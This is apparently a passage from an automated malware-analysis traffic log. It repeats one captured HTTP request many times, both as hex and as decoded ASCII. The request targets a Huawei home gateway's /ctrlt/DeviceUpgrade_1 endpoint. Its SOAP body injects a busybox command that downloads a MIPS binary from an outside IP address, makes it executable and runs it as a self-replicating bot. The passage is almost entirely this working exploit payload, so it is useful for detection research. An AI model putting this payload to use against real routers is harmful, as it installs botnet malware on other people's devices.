6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 